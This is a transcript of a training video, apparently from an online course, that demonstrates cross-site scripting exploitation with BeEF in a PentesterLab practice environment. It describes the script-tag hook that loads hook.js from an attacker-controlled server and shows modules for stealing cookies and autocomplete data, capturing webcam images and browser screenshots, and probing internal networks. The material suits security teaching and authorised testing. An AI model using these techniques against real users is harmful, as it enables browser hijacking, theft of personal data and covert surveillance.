Part 10 - Exploiting XSS

Video Activity

This lesson covers exploiting XSS using the BEEF tool. BEEF is a multi-step process which allows an attacker to take control of victim's browser.

Join over 3 million cybersecurity professionals advancing their career
Sign up with
Required fields are marked with an *
or

Already have an account? Sign In »

Time
4 hours 20 minutes
Difficulty
Intermediate
CEU/CPE
5
Video Description

This lesson covers exploiting XSS using the BEEF tool. BEEF is a multi-step process which allows an attacker to take control of victim's browser.

Video Transcription
00:03
>> Next we're going to use a tool called BeEF.
00:03
BeEF is a tool which allows you to gain
00:03
control over somebody's browser.
00:03
It's very dangerous.
00:03
But there's a couple of steps we have to do in order
00:03
to exploit the vulnerability.
00:03
First we'll need to build a malicious code.
00:03
Next we have to make the URL,
00:03
and then finally send that URL to a victim.
00:03
Then fourth step, profit.
00:03
First, we're going to start
00:03
the BeEF application from
00:03
the applications exploitation tools menu.
00:03
Then after that we're going to browse to 127.0.0.1 with
00:03
port 3000/UI/authentication and the username
00:03
and password will be beef.
00:03
Let's go do that. Go to Applications,
00:03
Exploitation Tools, and beef XSS framework.
00:03
Now, let's go over to our browser here.
00:03
Type UI authentication and we have our BeEF page.
00:03
Username, beef, the password of beef.
00:03
We are now in. Here's an example
00:03
of what the hook would be.
00:03
Now, if you were attacking somebody,
00:03
you would put your IP address in
00:03
here in the port 3000/hook.js,
00:03
and you would send that to them.
00:03
Next, the malicious code will need to be crafted.
00:03
How you do that is script source equals
00:03
attacker IP port 3000/hook.js.
00:03
This line can be found when you initially start BeEF up.
00:03
When you set it up,
00:03
you get hook in the example.
00:03
The hook will then need to be delivered,
00:03
and this would be done by placing in
00:03
a vulnerable field like we did with our prior example.
00:03
Or it can be delivered via a link.
00:03
You can either place it in a form field
00:03
and then as users go to that web page,
00:03
they just keep getting hit one by one and
00:03
just keep becoming bots to BeEF,
00:03
which is very dangerous.
00:03
However, if you just want to do a one-off,
00:03
you just send it to one person,
00:03
boom, they get hit.
00:03
It's an excellent tool to test just how
00:03
far somebody can interact with your network.
00:03
If you think, my intrusion prevention system or
00:03
my intrusion detection system will stop
00:03
somebody being able to do this, test it out.
00:03
See if somebody from the outside can
00:03
communicate and control somebody's web browser
00:03
from the inside of your network.
00:03
Then after we deliver the code,
00:03
we're going to wait for the victim to browse to
00:03
the site and then once they do,
00:03
you'll get a confirmation shown
00:03
here in the hook browsers.
00:03
Let's go put that malicious link into the web page,
00:03
browse to it, and then
00:03
see if we become a hooked browser.
00:03
Here we are on the BeEF control panel and we can see
00:03
that if there was any online browsers,
00:03
they would show up here.
00:03
These are all the offline browsers.
00:03
If you did have a computer hooked at one time,
00:03
that information will stay here for you to be able
00:03
to communicate with or
00:03
attempt to communicate with at another time.
00:03
Let's come back over here to PentesterLabs.
00:03
We're going to put it in our script here.
00:03
The IP address will be our local IP address,
00:03
192.168.0.10. Let's submit this query.
00:03
Let's execute this and see what happens.
00:03
We get the pop up from before
00:03
and I'm sure some of this information
00:03
is being sent over now.
00:03
Look at that, we have a hooked browser.
00:03
With this hooked browser, we can see
00:03
all different information about it,
00:03
including the cookie, host's IP address.
00:03
We know what website it's coming from,
00:03
the PentesterLab's website and the IP address
00:03
the website's coming from.
00:03
All kinds of nifty information.
00:03
It's very,
00:03
very awesome information that you can get from this.
00:03
Now we have all these different awesome pieces
00:03
of information about
00:03
this person who executed this exploit.
00:03
One thing we can do is we come over here to
00:03
logs and we see different events that have happened.
00:03
We also come over here to commands.
00:03
Now, commands are a pretty awesome tool
00:03
because the commands list do a lot of different things.
00:03
For example, if we have
00:03
a webcam hooked up to the browser,
00:03
we can actually take a picture
00:03
through the individuals webcam.
00:03
We are using a VM environment,
00:03
so you will have to actually go into
00:03
your virtual environment system settings up at the top,
00:03
and add USB device if you want to be
00:03
able to take a picture through your VM.
00:03
However, we're not going to bother
00:03
with all of that right now.
00:03
We can do stuff on here that is pretty awesome.
00:03
We can play sound to somebody over their browser,
00:03
or we can do more malicious things.
00:03
Things like attempting
00:03
a browser exploitation automatically,
00:03
or running a bunch of different cross-site
00:03
scripting exploits against the individual.
00:03
If it's green, it means that
00:03
that person is vulnerable to it.
00:03
If it's orange, you might be able to get it.
00:03
If it's red, you're probably not going to get it.
00:03
You can also do this to
00:03
>> get network information as well.
00:03
>> You can do pink sweeps internally on something.
00:03
If you want to get further information
00:03
on somebody's network,
00:03
you can have them go to
00:03
this page or go to a link that you have
00:03
this exploit setup at and you can get
00:03
further information about
00:03
>> the person's internal network.
00:03
>> There's also social engineering tools in here as well.
00:03
If you want to try to use
00:03
social engineering tools against
00:03
individuals in your network who you may be auditing.
00:03
How do you use one of these tools?
00:03
Well, let's detect some extensions.
00:03
You click on the item and then you click "Execute".
00:03
Now it checks for Google Chrome, Mozilla, Firefox.
00:03
We're not getting anything back really for this one.
00:03
But we see the command execute here,
00:03
and if you click on it you'll get the command results.
00:03
Let's try to get URLs that we've gone to.
00:03
Give us the URLs,
00:03
execute, come up here.
00:03
It's not an Avant Browser,
00:03
so it did not work.
00:03
But we're going to attempt to give this domains.
00:03
Let's execute that.
00:03
Will appear in the executes.
00:03
We see PentesterLabs freaking out up here
00:03
because our current program,
00:03
BeEF application here is trying
00:03
to basically go back
00:03
and go over all
00:03
of the different things that we've gone to.
00:03
Look at that, we've
00:03
got a whole bunch of different domains,
00:03
[LAUGHTER] many of which are false results.
00:03
Wow, really.
00:03
Let's get [inaudible] onto that one.
00:03
Let's execute one of these.
00:03
I'm going to come over here,
00:03
we're going to click " [inaudible] Eye".
00:03
We're going to execute. Now this takes
00:03
a picture of the victim's browser.
00:03
Let's come over here to command
00:03
1 and we're going to see the results.
00:03
This may take a second for the
00:03
>> other results to show up.
00:03
>> After you click something,
00:03
do not necessarily just give up real quick
00:03
because it will take a moment.
00:03
If it doesn't work the first time,
00:03
which it may not,
00:03
re-execute it a couple times,
00:03
and see if you gain results.
00:03
There we go. Fourth attempt,
00:03
we have a picture of a blog.
00:03
This is an excellent option
00:03
to be able to steal things that
00:03
the person might have typed or might have
00:03
up on their browser at that time,
00:03
which is pretty dangerous.
00:03
You can also attempt to steal
00:03
>> any auto-completes as well.
00:03
>> We can click "Execute" on
00:03
here and we're going to try stealing the
00:03
auto-completes that may have been on that browser.
00:03
I believe I have put any auto-completes in,
00:03
so let's drop down here.
00:03
Let's do name, we'll execute that one.
00:03
We'll do username or email.
00:03
Email. Let's see if we got anything back,
00:03
so command results got nothing for that one, nothing.
00:03
Now the cool thing about this is that you
00:03
can use it to test and find
00:03
different type of add-ons that may
00:03
be on the browser as well. I know I have fire bug.
00:03
But let's do a detect here and
00:03
see if it can find a fire bug.
00:03
It executes, come over here
00:03
to command 2 and look at that,
00:03
fire bug is enabled and in use.
00:03
Lots of things you can do with this.
00:03
Definitely see how far you can get with this tool.
00:03
Keep poking around and try it out because it's awesome,
00:03
all the different things you can do.
00:03
We also have the server itself here hooked.
00:03
You can also do commands against the server
00:03
itself and try to get
00:03
information from that web server even further.
00:03
Yeah, check it out.
00:03
It's awesome. What was covered?
00:03
Well, we covered how to exploit
00:03
cross-site scripting manually,
00:03
using redirection and cookie theft.
00:03
Then we also covered how to exploit cross-site
00:03
scripting with BeEF. Happy hacking everyone.
Up Next